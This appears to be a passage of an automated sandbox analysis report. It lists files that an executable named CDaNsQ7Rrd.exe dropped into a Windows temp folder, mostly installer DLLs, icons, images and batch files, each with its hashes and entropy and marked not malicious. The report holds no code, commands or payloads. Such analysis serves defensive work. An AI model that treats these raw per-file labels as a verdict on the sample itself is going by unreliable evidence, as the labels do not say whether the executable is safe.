C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\whitesmall.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	554
Entropy (8bit):	2.3567212079950774
Encrypted:	false
MD5:	4429F170056663EFD1486395E8EB0AF6
SHA1:	AE9B01A44C8EE5AE7146F0523E512EE32DC284AD
SHA-256:	FFE2980D90152EF603555A735B7CBA1917C99BB67061B44D6AC6F12E6384BDD9
SHA-512:	719F4E55944502F7D472F362DD0D1D09649FBAEC0515701C9C84BBB3F32B06CC29E4A4C55022BC034CBC68C9C151A90018A926D1A08B4D5048F117950E9135E9
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\New
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 1 icon
Size (bytes):	318
Entropy (8bit):	2.0344415800551814
Encrypted:	false
MD5:	C23CBF002D82192481B61ED7EC0890F4
SHA1:	DD373901C73760CA36907FF04691F5504FF00ABE
SHA-256:	4F92E804A11453382EBFF7FB0958879BAE88FE3366306911DEC9D811CD306EED
SHA-512:	5CC5AD0AE9F8808DEA013881E1661824BE94FB89736C3CB31221E85BE1F3A408D6E5951ACCD40EE34B3BAF76D8E9DD8820D61A26345C00CDDC0A884375EE1185
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\Prereq.dll
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\Up
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 1 icon
Size (bytes):	318
Entropy (8bit):	2.0369361465218
Encrypted:	false
MD5:	83730AC00391FB0F02F56FE2E4207A10
SHA1:	139FED8F0216132450E66BDA0FBBDC2A5BD333AF
SHA-256:	573E3260EED63604F24F6F10CE5294E25E22FDA9E5BFD9010134DE6E684BAB98
SHA-512:	E3DBE1956BB743FD68319517D1D993DDA316C12BBBBBBD6F582ECDD60C4FDE24CC4814C7AB36ED571F720349931EAC10B03E9C911BA0F4309B10604B2C56C6A9
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aicustact.dll
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	92800
Entropy (8bit):	6.179880794142425
Encrypted:	false
MD5:	6A9C36332255FCA66C688C75AA68E1DE
SHA1:	2A03E2A5E6A8D9E2B0CFB4E2CC1923D9C08578C1
SHA-256:	7B7EBADA5DA99A20C44EAF77E6D673985DA42D9B7CB4F5E4235B7579581AE170
SHA-512:	A638C48026F2A0B565B34D7D0DFACFEC4F582E698F88234521A6FCFF1ED90C134F39AA3311CCA2A67E401DE01F81CAC01D9F792F189127E0F87A345076827627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aipackagechainer.exe
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	280576
Entropy (8bit):	6.212263480310817
Encrypted:	false
MD5:	B4F05778C1E9BCF0BCBF0733FD6C763B
SHA1:	E0F0A2CF06ED43581FED238ABA71EB8BAD82CBEA
SHA-256:	1D6D2D7E16F333759348D331D69B0A5A7E135F4BB9D3615EDC59E305341324EA
SHA-512:	20423A3B3817D7E2D4D4F5E882837036824001938E87D645756FCD708290406DFCDE410F1D8017E88C4F0D9CEE068A53088A6B11100C9213AE22264A899CD64E
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	35778
Entropy (8bit):	7.943826171174218
Encrypted:	false
MD5:	C12B97D5A230A72970B0947FFD1D2CE1
SHA1:	F5AA3204EE60F34D736303DBF61F7342F95EAAB2
SHA-256:	8DFA97D18ACAEAA0ED13A43CCA6802D5C3637EAD536991915AC3D88636BA08D5
SHA-512:	CC7DF1BCF4A8EE24BAD3A148783B5C0B447DDA62E74EF0C39D16473C0362B2710360F42B576E22A1FB7FF57D885DE5133A79704A11AF7FBE92E790D70F4A87ED
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\cmdlinkarrow
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 16x16, 16-colors
Size (bytes):	2862
Entropy (8bit):	3.160430651939096
Encrypted:	false
MD5:	983358CE03817F1CA404BEFBE1E4D96A
SHA1:	75CE6CE80606BBB052DD35351ED95435892BAF8D
SHA-256:	7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
SHA-512:	BDEE6E81A9C15AC23684C9F654D11CC0DB683774367401AA2C240D57751534B1E5A179FE4042286402B6030467DB82EEDBF0586C427FAA9B29BD5EF74B807F3E
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1790
Entropy (8bit):	7.625556970420797
Encrypted:	false
MD5:	9A740549BD117BC16F6ACB8D884604D2
SHA1:	DA20E48ACDE3A7097F8335541DE40FE94C600E0A
SHA-256:	0DAED44A8E14750614AFDA54781621D400FED0D2ECEE9A4A402F5964D3CD3F5A
SHA-512:	3DA47437F97E28B4F7FBB0ABFF44A4811B96D8511AC736DABD24B598A98B274A2E8FB9C9475A08DE3478CD41683BA60DB771CE409E2ABA2799F866EC813A3E1E
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\completeex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	5.432735724336821
Encrypted:	false
MD5:	3EAFE3AE99BF33E9F59D970F21EBEF39
SHA1:	E9895CB920FDEB8907CE37D9666D4999A1DE5D2F
SHA-256:	5F6C78970EE7E3D668EB8A4ACB5D251C76599424A0B0372E7665527516D4C312
SHA-512:	8983717D464AC046A8A272276E90D3D1FD7900D2D89998FC332E420ECA4F01FCFBABB390667B4324C549D0655E62E181E3E7BEED514C5B9B67D0F8D480A9388D
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\customex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	5.4001074083138745
Encrypted:	false
MD5:	1B5701D7F753135C22CC1AE694FFAF4B
SHA1:	966BDEF4159022FCC8740B6EB75B8D7AC4212504
SHA-256:	AEBA695175ED96D3EDE9FE30E486DF59C64A5FD802C15CB67F55E03A0537CD13
SHA-512:	4069B6AC1E51703687E0C17EA83527A258FF0C4BB4DC8051C96E5F98A7902C3301B89A5D2B55872711F85F528B0FB9BAEAF94E93B49B0A48BB8912E06A204EAC
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\exclamation.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 2 icons, 48x48, 256-colors
Size (bytes):	13430
Entropy (8bit):	4.339511276304085
Encrypted:	false
MD5:	93D722FA20A988A5C257A58BF155DC66
SHA1:	30C0D19F02CB39F8804DAFE6AF483A09C76E2338
SHA-256:	F587867EED0BEC33EF150F3A8525BDE9B6746C705543874E56653AA80EA53225
SHA-512:	BFB91739AE7432DD7D0A919F15B5B721E733675C3C2A4D5238C9955A6517DD4653042FA444F2D2627508908F6DA7DE0FBF22F37CF1A60476F59CBF254F62F736
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\finalizing.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1701
Entropy (8bit):	7.587567657324339
Encrypted:	false
MD5:	02F6BBE060F32E49E3CAF2DE8E60EC7F
SHA1:	4674875A4F264A947DA6BF6F626B9BD50325D034
SHA-256:	20072AE2E122A6407DAC4771544158D7BCECEBF98404C22001B0E69F79C8580D
SHA-512:	DAAADBF113AF1AF0315333089E8B6FF4891D1FE0FA95E5ECAEAF763DA593BCB4A8E1A1A940F44A3A5B6E22A9296CAB1FA56E4D533CD938F434B565D6323FB588
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\info
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 2 icons, 32x32, 16-colors
Size (bytes):	1078
Entropy (8bit):	2.8642269548572474
Encrypted:	false
MD5:	554FF4C199562515D758C9ABFF5C2943
SHA1:	9E3BAB3A975E638EAD9E03731AE82FA1DBCD178C
SHA-256:	9AE4A96BF2A349667E844ACC1E2AC4F89361A6182268438F4D063DF3A6FC47BC
SHA-512:	E302EDF3DAB3A0E9EEB5AFA34E4910EE177099C017B42F86847CF972143C87E8C40BC47689A3C8845051EAB98258A392CCAF331F414C271A1B6B751F503CE221
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\infoex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 6 icons, 48x48, 256-colors
Size (bytes):	22486
Entropy (8bit):	5.511908704029649
Encrypted:	false
MD5:	FD535E63F539EACB3F11D03B52B39A80
SHA1:	A7F8C942E5672F2972C82210A38CC8861435F643
SHA-256:	0086BC01150989F553A0A4AE0E14926C6E247CEDDA312E1F946AE35D575742AB
SHA-512:	716EAB95B5535D54359D12C9786F5A53F9560126D2C48EB1A94DB5BD383363B43EA686AC421080564B54450DA35AF9CE3E11CECD485AAF27C0CEAEE7836F4518
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\installing.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1794
Entropy (8bit):	7.61906650791519
Encrypted:	false
MD5:	A98E2F7D5DC055AD4B4B6D92126D9190
SHA1:	C2DB85DCF7BF991E8BBA0D39F952748DC98D41D6
SHA-256:	65751616EDB29437B01CD352B8651835CA585942A78ADAAC589F9F8C16039470
SHA-512:	C10AA6FE00361AB2FD6D78496FD20CB2361F235563156D4C41EC6E2E86207C964CDC3B303B927FC64A3FE86D4F5930C0C775E8D0E213F0D63A79F22133128FEA
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\lzmaextractor.dll
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	12416
Entropy (8bit):	6.147935614181273
Encrypted:	false
MD5:	6A06D2405B81845330AE5C97B31D2663
SHA1:	75293A2C50528D86197976A1A74BEB97A6202A65
SHA-256:	6E0F72297A10EB38593FAF6D52CE964C45873F2E2F4FDCF468FB592FB763851C
SHA-512:	6E42165A176943512D0BD5BB7C5AC4E346291FA9082831435D59DE97859AC0D1F3FDD1BB8AC2BD08B24A634FA484F19B448D42C96C319E0DA5C90FABD7D55F05
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\minbackground.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	8955
Entropy (8bit):	7.924419497502312
Encrypted:	false
MD5:	EC713B6158A057B7825274AE4E1CF183
SHA1:	C8178CF6A46E14E82F4EBDE407FF04FF931CA7DD
SHA-256:	04942FB23C0FB15AA732881C411FD2B4F44A621267E2C1DE182C39B014A87211
SHA-512:	59D90C027C5D06338F8C410EA971961FBB6990394FF929A7CB5EC664901F9819566D0ABC1123A0B4F3730792D8CB30FB7FD4E3AB5A4154C9F41DCB00C4DDED9A
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\preparing.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1799
Entropy (8bit):	7.627751600207026
Encrypted:	false
MD5:	D20270537AE700B03B988FC7471C820E
SHA1:	3B68B1BE0A7D30DF6ED8952C34794E90102B77DF
SHA-256:	A8C29D7365A7ED4191B20D08BE6274215F5F12BE420E826852205C4F3755DBB4
SHA-512:	F8245BFF51757D1D44F4DA5DECE49F6B96D704E72A2B6D2EDFA517029A69EB410CDEA3945A2C3C29A32E6E9E0CB1A0B0938C4F7D3711446EC963913B4E6A3780
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\removeex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	3.6742809399919576
Encrypted:	false
MD5:	AA0A5F0280C98006741B6CB56C3A360E
SHA1:	AC820BBEC6D08545A4A4818DF9EB09B521BF2E40
SHA-256:	2AC61CEA48CCDB1751CB6B93BA90267508ED6AC900B2E2AC6EAD172C9B8958F2
SHA-512:	7646B3786039711FD60BD9C82A2CBAC51CAA75626CD1695F29EF4939637F60118F6B32B6B781EC57D6F478091C33DC886B2B6C3751B948CD0E916E617C52B254
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\repairex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	5.656471862600903
Encrypted:	false
MD5:	4DBA3637F5FCEAADD2184BD8A0F0FB95
SHA1:	A858418C32F5D45F15AB01CAFC652B507DE2A42B
SHA-256:	C1AD1E78A112974326B44F75FE302723A4FC8AC1CCD96C9887403F6DDF8E607D
SHA-512:	DA105188273312DD1C79D90C2A1AE17ED584A70C14BCD662EAB3B7FC99D7A91B30957D965498E6FB397E01EA72ED3EA0AB8BDBB4313E68E8E45073B87E412E26
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\tabback
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PC bitmap, Windows 3.x format, 1 x 200 x 24
Size (bytes):	854
Entropy (8bit):	3.802531598764924
Encrypted:	false
MD5:	4C3DDA35E23D44E273D82F7F4C38470A
SHA1:	B62BC59F3EED29D3509C7908DA72041BD9495178
SHA-256:	E728F79439E07DF1AFBCF03E8788FA0B8B08CF459DB31FC8568BC511BF799537
SHA-512:	AB27A59ECCDCAAB420B6E498F43FDFE857645E5DA8E88D3CFD0E12FE96B3BB8A5285515688C7EEC838BBE6C2A40EA7742A9763CF5438D740756905515D9B0CC5
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\typicalex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	4.926016576393048
Encrypted:	false
MD5:	EB3F9054BB5F95ED6B10EC4E16A026BE
SHA1:	35760271A03029996BDA26D5D596CFCC465E3EA9
SHA-256:	E330FA8030AA0465B02880133ADDBA0A8C6011B511F6968B413BF45516F7275E
SHA-512:	B0A96DA5514A9B8E9FA182A294694299388A854245AEC01E835B1108D568F9F1158917D9792BC852568EC56C2ED5E54F9E630E02D1EC79A281E2B28A67167A51
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\white.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1232
Entropy (8bit):	1.290282383283862
Encrypted:	false
MD5:	57D130DDF327FCC5DA636A6AB4D7C112
SHA1:	D674F332D4F79C70D4A97BFD9E504A8F3A2C26B6
SHA-256:	990EAB9FAAAE9F78201EF00A72F7B59773EED2B2FC9EC72250C67F376EE0500F
SHA-512:	E2F2141973CD9B7B52347EBCC89E89FDDEAA5B9721011C2CD7B2F2EAE434EF0F10D02537EB0F1AD6276FA182147AE935277EF9BBE31960EE2D82437C0741D39D
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\whitesmall.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	554
Entropy (8bit):	2.3567212079950774
Encrypted:	false
MD5:	4429F170056663EFD1486395E8EB0AF6
SHA1:	AE9B01A44C8EE5AE7146F0523E512EE32DC284AD
SHA-256:	FFE2980D90152EF603555A735B7CBA1917C99BB67061B44D6AC6F12E6384BDD9
SHA-512:	719F4E55944502F7D472F362DD0D1D09649FBAEC0515701C9C84BBB3F32B06CC29E4A4C55022BC034CBC68C9C151A90018A926D1A08B4D5048F117950E9135E9
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Size (bytes):	412
Entropy (8bit):	5.128063610240805
Encrypted:	false
MD5:	462F4769839FAECD5A1DA76516DD717D
SHA1:	30CEBD26F57F1084AE4A671075C784B75A2A8DA3
SHA-256:	E57A9CB4FBB1F474B7346656FAF351DA5517C2D9CB57825F0DA68C98E56F098A
SHA-512:	B9E3B4EE18DE0723DCD80097B40110B66C8734F80228E1BA60E2B60B8F121B0092E0F3B833374172E1B933D9F0639D67E7C9C92CE52A95EE66002CC51FD2A5AA
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Size (bytes):	412
Entropy (8bit):	5.112837167645429
Encrypted:	false
MD5:	EBBA496F1885D98084B2B44C882E3D01
SHA1:	FE773FBC5FCE8760A6AC62CFBA10D560B76AFF13
SHA-256:	BED726664B4F2B49C3480B1DC5C400102E8F1D6ACD101CEB74211B10D82158A4
SHA-512:	CDD7840149B528D7A7A3787C04F9ECB09748B4A93208544A9AF459787A3F22AA84856CF5F4DE36D2AEF3CAD4DAC642076C444ECAF66B890793C90A386142398B
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI1B1D.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI1F56.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI2A4F.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	92800
Entropy (8bit):	6.179880794142425
Encrypted:	false
MD5:	6A9C36332255FCA66C688C75AA68E1DE
SHA1:	2A03E2A5E6A8D9E2B0CFB4E2CC1923D9C08578C1
SHA-256:	7B7EBADA5DA99A20C44EAF77E6D673985DA42D9B7CB4F5E4235B7579581AE170
SHA-512:	A638C48026F2A0B565B34D7D0DFACFEC4F582E698F88234521A6FCFF1ED90C134F39AA3311CCA2A67E401DE01F81CAC01D9F792F189127E0F87A345076827627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI2B4A.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	92800
Entropy (8bit):	6.179880794142425
Encrypted:	false
MD5:	6A9C36332255FCA66C688C75AA68E1DE
SHA1:	2A03E2A5E6A8D9E2B0CFB4E2CC1923D9C08578C1
SHA-256:	7B7EBADA5DA99A20C44EAF77E6D673985DA42D9B7CB4F5E4235B7579581AE170
SHA-512:	A638C48026F2A0B565B34D7D0DFACFEC4F582E698F88234521A6FCFF1ED90C134F39AA3311CCA2A67E401DE01F81CAC01D9F792F189127E0F87A345076827627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI3093.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI31A3.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI31FE.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI61FE.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI6D94.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI9546.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	92800
Entropy (8bit):	6.179880794142425
Encrypted:	false
MD5:	6A9C36332255FCA66C688C75AA68E1DE
SHA1:	2A03E2A5E6A8D9E2B0CFB4E2CC1923D9C08578C1
SHA-256:	7B7EBADA5DA99A20C44EAF77E6D673985DA42D9B7CB4F5E4235B7579581AE170
SHA-512:	A638C48026F2A0B565B34D7D0DFACFEC4F582E698F88234521A6FCFF1ED90C134F39AA3311CCA2A67E401DE01F81CAC01D9F792F189127E0F87A345076827627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI9605.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	92800
Entropy (8bit):	6.179880794142425
Encrypted:	false
MD5:	6A9C36332255FCA66C688C75AA68E1DE
SHA1:	2A03E2A5E6A8D9E2B0CFB4E2CC1923D9C08578C1
SHA-256:	7B7EBADA5DA99A20C44EAF77E6D673985DA42D9B7CB4F5E4235B7579581AE170
SHA-512:	A638C48026F2A0B565B34D7D0DFACFEC4F582E698F88234521A6FCFF1ED90C134F39AA3311CCA2A67E401DE01F81CAC01D9F792F189127E0F87A345076827627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSI973D.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	92800
Entropy (8bit):	6.179880794142425
Encrypted:	false
MD5:	6A9C36332255FCA66C688C75AA68E1DE
SHA1:	2A03E2A5E6A8D9E2B0CFB4E2CC1923D9C08578C1
SHA-256:	7B7EBADA5DA99A20C44EAF77E6D673985DA42D9B7CB4F5E4235B7579581AE170
SHA-512:	A638C48026F2A0B565B34D7D0DFACFEC4F582E698F88234521A6FCFF1ED90C134F39AA3311CCA2A67E401DE01F81CAC01D9F792F189127E0F87A345076827627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSIB368.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSIEC54.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\MSIECF5.tmp
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
